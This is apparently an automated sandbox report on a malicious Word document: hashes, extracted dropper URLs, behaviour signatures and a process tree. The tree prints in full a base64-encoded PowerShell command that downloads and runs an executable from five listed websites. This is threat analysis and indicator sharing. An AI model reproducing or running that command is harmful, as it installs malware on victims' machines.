Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2022 09:00

General

  • Target

    5a68bbf45f70df757d3cb5593c4b71defe4d3ee5f6c2bc4b6346f3b0de162be0.doc

  • Size

    166KB

  • MD5

    6f829d74b79fea45aa4220789ff5a7ee

  • SHA1

    8f30553e939c29a7ea1c2c8129fd4dfb718eefe5

  • SHA256

    5a68bbf45f70df757d3cb5593c4b71defe4d3ee5f6c2bc4b6346f3b0de162be0

  • SHA512

    1b4db6aa46f6f7b1df54f3f13d3b45d92039aab67ad22a92e7bac8f509b2cb624967f0cfb9cb409757a63dc7870e9e2607f45635641fa0b881ab2a0826bd50a4

  • SSDEEP

    3072:h77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qDn8Sep68T3GnNLX:h77HUUUUUUUUUUUUUUUUUUUT52VKnepA

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.plantationslidingdoorrepair.net/wp-content/Fz/

exe.dropper

http://gestationaldiabetes.eastus.cloudapp.azure.com/wp-content/2F/

exe.dropper

http://urist-advokat-mogilev.by/wp-content/XIBe/

exe.dropper

http://ariasms.ir/wp-content/RM/

exe.dropper

http://doodleninja.in/wp-includes/KMg/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5a68bbf45f70df757d3cb5593c4b71defe4d3ee5f6c2bc4b6346f3b0de162be0.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:780
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABtAEcAWgBBAEEAWgA0AFEAPQAoACcAegBHAFEAWABBACcAKwAnAEEAJwArACcAQQBEACcAKQA7ACQAegA0AGsAQQBEAEEAMQBBAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDADQAawBHAEEAUQBrAD0AKAAnAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AdwB3AHcALgBwACcAKwAnAGwAJwArACcAYQBuAHQAYQB0ACcAKwAnAGkAbwBuAHMAbABpAGQAaQBuAGcAJwArACcAZABvAG8AcgAnACsAJwByAGUAcABhAGkAcgAuAG4AJwArACcAZQB0AC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AdAAvAEYAegAvAEAAaAB0AHQAJwArACcAcAA6AC8ALwBnACcAKwAnAGUAcwB0AGEAdABpACcAKwAnAG8AJwArACcAbgBhAGwAZABpAGEAYgAnACsAJwBlAHQAZQAnACsAJwBzAC4AZQBhAHMAdAB1AHMALgAnACsAJwBjAGwAbwB1AGQAYQBwAHAALgBhAHoAJwArACcAdQByAGUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtAGMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAJwArACcALwAyAEYALwBAAGgAdAB0AHAAOgAvAC8AdQByAGkAcwAnACsAJwB0AC0AYQBkAHYAbwBrAGEAdAAtACcAKwAnAG0AbwBnACcAKwAnAGkAbABlAHYAJwArACcALgBiAHkALwAnACsAJwB3ACcAKwAnAHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0ACcAKwAnAC8AWABJAEIAZQAvAEAAaAB0AHQAcAA6ACcAKwAnAC8ALwBhACcAKwAnAHIAJwArACcAaQBhACcAKwAnAHMAbQBzAC4AaQByAC8AdwAnACsAJwBwAC0AYwBvACcAKwAnAG4AdABlAG4AdAAvAFIATQAvAEAAaAB0AHQAcAAnACsAJwA6AC8AJwArACcALwBkAG8AJwArACcAbwBkACcAKwAnAGwAZQBuAGkAbgBqAGEALgBpACcAKwAnAG4ALwAnACsAJwB3AHAAJwArACcALQAnACsAJwBpAG4AYwBsACcAKwAnAHUAZABlAHMAJwArACcALwBLAE0AJwArACcAZwAnACsAJwAvACcAKQAuACgAJwBTAHAAJwArACcAbABpAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAnAEAAJwApADsAJABtAFoAYwBEAGMAawA9ACgAJwBqAEEAWABYACcAKwAnAGMAUQAnACkAOwAkAFUAQgA0AFUAQQBDAFEAIAA9ACAAKAAnADMAMwAnACsAJwA2ACcAKQA7ACQATwBDAEIARwBRAEEAQQA9ACgAJwBmAEcAJwArACcAXwBVAEEAQgBBAG8AJwApADsAJABUAEEAMQBBAGsAawA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQBCADQAVQBBAEMAUQArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAG0AawBjAEEAQQBEAHcAIABpAG4AIAAkAEMANABrAEcAQQBRAGsAKQB7AHQAcgB5AHsAJAB6ADQAawBBAEQAQQAxAEEALgAoACcARABvAHcAJwArACcAbgBsAG8AYQBkAEYAaQBsACcAKwAnAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG0AawBjAEEAQQBEAHcALAAgACQAVABBADEAQQBrAGsAKQA7ACQAawBVAFEAMQB3AEIAPQAoACcAagBBAFUAQQAnACsAJwBCADQAJwArACcAQwBjACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABUAEEAMQBBAGsAawApAC4AIgBsAGUAYABOAGAAZwB0AGgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawBlACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAFQAQQAxAEEAawBrADsAJABVAEMANABHAFEAWABRADQAPQAoACcAVAAnACsAJwBBAEEAawBaAEQAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEARwBBAGsAbwBrAFUAUQA9ACgAJwBxAG8AJwArACcAXwBBAEEAJwArACcAQgBfACcAKQA7AA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1684

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/780-60-0x0000000000000000-mapping.dmp
    • memory/780-61-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp
      Filesize

      8KB

    • memory/1348-57-0x000000007103D000-0x0000000071048000-memory.dmp
      Filesize

      44KB

    • memory/1348-54-0x00000000725D1000-0x00000000725D4000-memory.dmp
      Filesize

      12KB

    • memory/1348-58-0x0000000074F41000-0x0000000074F43000-memory.dmp
      Filesize

      8KB

    • memory/1348-59-0x000000007103D000-0x0000000071048000-memory.dmp
      Filesize

      44KB

    • memory/1348-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1348-55-0x0000000070051000-0x0000000070053000-memory.dmp
      Filesize

      8KB

    • memory/1684-65-0x000007FEF36F0000-0x000007FEF4113000-memory.dmp
      Filesize

      10.1MB

    • memory/1684-67-0x00000000028B4000-0x00000000028B7000-memory.dmp
      Filesize

      12KB

    • memory/1684-66-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp
      Filesize

      11.4MB

    • memory/1684-68-0x00000000028BB000-0x00000000028DA000-memory.dmp
      Filesize

      124KB

    • memory/1684-69-0x00000000028B4000-0x00000000028B7000-memory.dmp
      Filesize

      12KB